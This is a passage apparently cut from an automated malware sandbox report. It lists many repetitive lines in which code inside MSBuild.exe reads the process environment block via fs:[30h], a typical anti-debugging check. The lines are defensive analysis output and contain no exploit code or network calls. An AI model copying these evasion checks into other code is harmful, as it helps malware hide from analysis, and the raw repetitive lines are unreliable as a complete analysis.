          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102A309 mov eax, dword ptr fs:[00000030h]3_2_0102A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102A309 mov eax, dword ptr fs:[00000030h]3_2_0102A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102A309 mov eax, dword ptr fs:[00000030h]3_2_0102A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102A309 mov eax, dword ptr fs:[00000030h]3_2_0102A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102A309 mov eax, dword ptr fs:[00000030h]3_2_0102A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102A309 mov eax, dword ptr fs:[00000030h]3_2_0102A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102A309 mov eax, dword ptr fs:[00000030h]3_2_0102A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102A309 mov eax, dword ptr fs:[00000030h]3_2_0102A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102A309 mov eax, dword ptr fs:[00000030h]3_2_0102A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102A309 mov eax, dword ptr fs:[00000030h]3_2_0102A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C131B mov eax, dword ptr fs:[00000030h]3_2_010C131B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0100DB40 mov eax, dword ptr fs:[00000030h]3_2_0100DB40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D8B58 mov eax, dword ptr fs:[00000030h]3_2_010D8B58
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0100F358 mov eax, dword ptr fs:[00000030h]3_2_0100F358
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0100DB60 mov ecx, dword ptr fs:[00000030h]3_2_0100DB60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01033B7A mov eax, dword ptr fs:[00000030h]3_2_01033B7A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01033B7A mov eax, dword ptr fs:[00000030h]3_2_01033B7A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C138A mov eax, dword ptr fs:[00000030h]3_2_010C138A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010BD380 mov ecx, dword ptr fs:[00000030h]3_2_010BD380
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01011B8F mov eax, dword ptr fs:[00000030h]3_2_01011B8F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01011B8F mov eax, dword ptr fs:[00000030h]3_2_01011B8F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103B390 mov eax, dword ptr fs:[00000030h]3_2_0103B390
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01032397 mov eax, dword ptr fs:[00000030h]3_2_01032397
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D5BA5 mov eax, dword ptr fs:[00000030h]3_2_010D5BA5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01034BAD mov eax, dword ptr fs:[00000030h]3_2_01034BAD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01034BAD mov eax, dword ptr fs:[00000030h]3_2_01034BAD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01034BAD mov eax, dword ptr fs:[00000030h]3_2_01034BAD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010853CA mov eax, dword ptr fs:[00000030h]3_2_010853CA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010853CA mov eax, dword ptr fs:[00000030h]3_2_010853CA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010303E2 mov eax, dword ptr fs:[00000030h]3_2_010303E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010303E2 mov eax, dword ptr fs:[00000030h]3_2_010303E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010303E2 mov eax, dword ptr fs:[00000030h]3_2_010303E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010303E2 mov eax, dword ptr fs:[00000030h]3_2_010303E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010303E2 mov eax, dword ptr fs:[00000030h]3_2_010303E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010303E2 mov eax, dword ptr fs:[00000030h]3_2_010303E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010B23E3 mov ecx, dword ptr fs:[00000030h]3_2_010B23E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010B23E3 mov ecx, dword ptr fs:[00000030h]3_2_010B23E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010B23E3 mov eax, dword ptr fs:[00000030h]3_2_010B23E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102DBE9 mov eax, dword ptr fs:[00000030h]3_2_0102DBE9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01018A0A mov eax, dword ptr fs:[00000030h]3_2_01018A0A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01005210 mov eax, dword ptr fs:[00000030h]3_2_01005210
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01005210 mov ecx, dword ptr fs:[00000030h]3_2_01005210
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01005210 mov eax, dword ptr fs:[00000030h]3_2_01005210
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01005210 mov eax, dword ptr fs:[00000030h]3_2_01005210
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0100AA16 mov eax, dword ptr fs:[00000030h]3_2_0100AA16
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0100AA16 mov eax, dword ptr fs:[00000030h]3_2_0100AA16
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010CAA16 mov eax, dword ptr fs:[00000030h]3_2_010CAA16
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010CAA16 mov eax, dword ptr fs:[00000030h]3_2_010CAA16
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01023A1C mov eax, dword ptr fs:[00000030h]3_2_01023A1C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01044A2C mov eax, dword ptr fs:[00000030h]3_2_01044A2C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01044A2C mov eax, dword ptr fs:[00000030h]3_2_01044A2C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102A229 mov eax, dword ptr fs:[00000030h]3_2_0102A229
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102A229 mov eax, dword ptr fs:[00000030h]3_2_0102A229
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102A229 mov eax, dword ptr fs:[00000030h]3_2_0102A229
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102A229 mov eax, dword ptr fs:[00000030h]3_2_0102A229
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102A229 mov eax, dword ptr fs:[00000030h]3_2_0102A229
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102A229 mov eax, dword ptr fs:[00000030h]3_2_0102A229
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102A229 mov eax, dword ptr fs:[00000030h]3_2_0102A229
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102A229 mov eax, dword ptr fs:[00000030h]3_2_0102A229
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102A229 mov eax, dword ptr fs:[00000030h]3_2_0102A229
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01009240 mov eax, dword ptr fs:[00000030h]3_2_01009240
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01009240 mov eax, dword ptr fs:[00000030h]3_2_01009240
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01009240 mov eax, dword ptr fs:[00000030h]3_2_01009240
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01009240 mov eax, dword ptr fs:[00000030h]3_2_01009240
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010CEA55 mov eax, dword ptr fs:[00000030h]3_2_010CEA55
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01094257 mov eax, dword ptr fs:[00000030h]3_2_01094257
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010BB260 mov eax, dword ptr fs:[00000030h]3_2_010BB260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010BB260 mov eax, dword ptr fs:[00000030h]3_2_010BB260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D8A62 mov eax, dword ptr fs:[00000030h]3_2_010D8A62
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0104927A mov eax, dword ptr fs:[00000030h]3_2_0104927A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103D294 mov eax, dword ptr fs:[00000030h]3_2_0103D294
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103D294 mov eax, dword ptr fs:[00000030h]3_2_0103D294
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010052A5 mov eax, dword ptr fs:[00000030h]3_2_010052A5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010052A5 mov eax, dword ptr fs:[00000030h]3_2_010052A5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010052A5 mov eax, dword ptr fs:[00000030h]3_2_010052A5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010052A5 mov eax, dword ptr fs:[00000030h]3_2_010052A5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010052A5 mov eax, dword ptr fs:[00000030h]3_2_010052A5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0101AAB0 mov eax, dword ptr fs:[00000030h]3_2_0101AAB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0101AAB0 mov eax, dword ptr fs:[00000030h]3_2_0101AAB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103FAB0 mov eax, dword ptr fs:[00000030h]3_2_0103FAB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01032ACB mov eax, dword ptr fs:[00000030h]3_2_01032ACB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C4AEF mov eax, dword ptr fs:[00000030h]3_2_010C4AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C4AEF mov eax, dword ptr fs:[00000030h]3_2_010C4AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C4AEF mov eax, dword ptr fs:[00000030h]3_2_010C4AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C4AEF mov eax, dword ptr fs:[00000030h]3_2_010C4AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C4AEF mov eax, dword ptr fs:[00000030h]3_2_010C4AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C4AEF mov eax, dword ptr fs:[00000030h]3_2_010C4AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C4AEF mov eax, dword ptr fs:[00000030h]3_2_010C4AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C4AEF mov eax, dword ptr fs:[00000030h]3_2_010C4AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C4AEF mov eax, dword ptr fs:[00000030h]3_2_010C4AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C4AEF mov eax, dword ptr fs:[00000030h]3_2_010C4AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C4AEF mov eax, dword ptr fs:[00000030h]3_2_010C4AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C4AEF mov eax, dword ptr fs:[00000030h]3_2_010C4AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C4AEF mov eax, dword ptr fs:[00000030h]3_2_010C4AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C4AEF mov eax, dword ptr fs:[00000030h]3_2_010C4AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01032AE4 mov eax, dword ptr fs:[00000030h]3_2_01032AE4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0100AD30 mov eax, dword ptr fs:[00000030h]3_2_0100AD30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01013D34 mov eax, dword ptr fs:[00000030h]3_2_01013D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01013D34 mov eax, dword ptr fs:[00000030h]3_2_01013D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01013D34 mov eax, dword ptr fs:[00000030h]3_2_01013D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01013D34 mov eax, dword ptr fs:[00000030h]3_2_01013D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01013D34 mov eax, dword ptr fs:[00000030h]3_2_01013D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01013D34 mov eax, dword ptr fs:[00000030h]3_2_01013D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01013D34 mov eax, dword ptr fs:[00000030h]3_2_01013D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01013D34 mov eax, dword ptr fs:[00000030h]3_2_01013D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01013D34 mov eax, dword ptr fs:[00000030h]3_2_01013D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01013D34 mov eax, dword ptr fs:[00000030h]3_2_01013D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01013D34 mov eax, dword ptr fs:[00000030h]3_2_01013D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01013D34 mov eax, dword ptr fs:[00000030h]3_2_01013D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01013D34 mov eax, dword ptr fs:[00000030h]3_2_01013D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010CE539 mov eax, dword ptr fs:[00000030h]3_2_010CE539
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01034D3B mov eax, dword ptr fs:[00000030h]3_2_01034D3B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01034D3B mov eax, dword ptr fs:[00000030h]3_2_01034D3B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01034D3B mov eax, dword ptr fs:[00000030h]3_2_01034D3B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D8D34 mov eax, dword ptr fs:[00000030h]3_2_010D8D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0108A537 mov eax, dword ptr fs:[00000030h]3_2_0108A537
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01043D43 mov eax, dword ptr fs:[00000030h]3_2_01043D43
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01083540 mov eax, dword ptr fs:[00000030h]3_2_01083540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010B3D40 mov eax, dword ptr fs:[00000030h]3_2_010B3D40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01027D50 mov eax, dword ptr fs:[00000030h]3_2_01027D50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102C577 mov eax, dword ptr fs:[00000030h]3_2_0102C577
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102C577 mov eax, dword ptr fs:[00000030h]3_2_0102C577
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01032581 mov eax, dword ptr fs:[00000030h]3_2_01032581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01032581 mov eax, dword ptr fs:[00000030h]3_2_01032581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01032581 mov eax, dword ptr fs:[00000030h]3_2_01032581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01032581 mov eax, dword ptr fs:[00000030h]3_2_01032581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01002D8A mov eax, dword ptr fs:[00000030h]3_2_01002D8A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01002D8A mov eax, dword ptr fs:[00000030h]3_2_01002D8A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01002D8A mov eax, dword ptr fs:[00000030h]3_2_01002D8A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01002D8A mov eax, dword ptr fs:[00000030h]3_2_01002D8A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01002D8A mov eax, dword ptr fs:[00000030h]3_2_01002D8A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C2D82 mov eax, dword ptr fs:[00000030h]3_2_010C2D82
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C2D82 mov eax, dword ptr fs:[00000030h]3_2_010C2D82
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C2D82 mov eax, dword ptr fs:[00000030h]3_2_010C2D82
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C2D82 mov eax, dword ptr fs:[00000030h]3_2_010C2D82
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C2D82 mov eax, dword ptr fs:[00000030h]3_2_010C2D82
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C2D82 mov eax, dword ptr fs:[00000030h]3_2_010C2D82
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C2D82 mov eax, dword ptr fs:[00000030h]3_2_010C2D82
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103FD9B mov eax, dword ptr fs:[00000030h]3_2_0103FD9B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103FD9B mov eax, dword ptr fs:[00000030h]3_2_0103FD9B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D05AC mov eax, dword ptr fs:[00000030h]3_2_010D05AC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D05AC mov eax, dword ptr fs:[00000030h]3_2_010D05AC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010335A1 mov eax, dword ptr fs:[00000030h]3_2_010335A1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01031DB5 mov eax, dword ptr fs:[00000030h]3_2_01031DB5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01031DB5 mov eax, dword ptr fs:[00000030h]3_2_01031DB5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01031DB5 mov eax, dword ptr fs:[00000030h]3_2_01031DB5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01086DC9 mov eax, dword ptr fs:[00000030h]3_2_01086DC9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01086DC9 mov eax, dword ptr fs:[00000030h]3_2_01086DC9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01086DC9 mov eax, dword ptr fs:[00000030h]3_2_01086DC9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01086DC9 mov ecx, dword ptr fs:[00000030h]3_2_01086DC9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01086DC9 mov eax, dword ptr fs:[00000030h]3_2_01086DC9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01086DC9 mov eax, dword ptr fs:[00000030h]3_2_01086DC9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0101D5E0 mov eax, dword ptr fs:[00000030h]3_2_0101D5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0101D5E0 mov eax, dword ptr fs:[00000030h]3_2_0101D5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010CFDE2 mov eax, dword ptr fs:[00000030h]3_2_010CFDE2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010CFDE2 mov eax, dword ptr fs:[00000030h]3_2_010CFDE2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010CFDE2 mov eax, dword ptr fs:[00000030h]3_2_010CFDE2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010CFDE2 mov eax, dword ptr fs:[00000030h]3_2_010CFDE2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010B8DF1 mov eax, dword ptr fs:[00000030h]3_2_010B8DF1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D740D mov eax, dword ptr fs:[00000030h]3_2_010D740D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D740D mov eax, dword ptr fs:[00000030h]3_2_010D740D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D740D mov eax, dword ptr fs:[00000030h]3_2_010D740D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01086C0A mov eax, dword ptr fs:[00000030h]3_2_01086C0A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01086C0A mov eax, dword ptr fs:[00000030h]3_2_01086C0A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01086C0A mov eax, dword ptr fs:[00000030h]3_2_01086C0A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01086C0A mov eax, dword ptr fs:[00000030h]3_2_01086C0A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C1C06 mov eax, dword ptr fs:[00000030h]3_2_010C1C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C1C06 mov eax, dword ptr fs:[00000030h]3_2_010C1C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C1C06 mov eax, dword ptr fs:[00000030h]3_2_010C1C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C1C06 mov eax, dword ptr fs:[00000030h]3_2_010C1C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C1C06 mov eax, dword ptr fs:[00000030h]3_2_010C1C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C1C06 mov eax, dword ptr fs:[00000030h]3_2_010C1C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C1C06 mov eax, dword ptr fs:[00000030h]3_2_010C1C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C1C06 mov eax, dword ptr fs:[00000030h]3_2_010C1C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C1C06 mov eax, dword ptr fs:[00000030h]3_2_010C1C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C1C06 mov eax, dword ptr fs:[00000030h]3_2_010C1C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C1C06 mov eax, dword ptr fs:[00000030h]3_2_010C1C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C1C06 mov eax, dword ptr fs:[00000030h]3_2_010C1C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C1C06 mov eax, dword ptr fs:[00000030h]3_2_010C1C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C1C06 mov eax, dword ptr fs:[00000030h]3_2_010C1C06
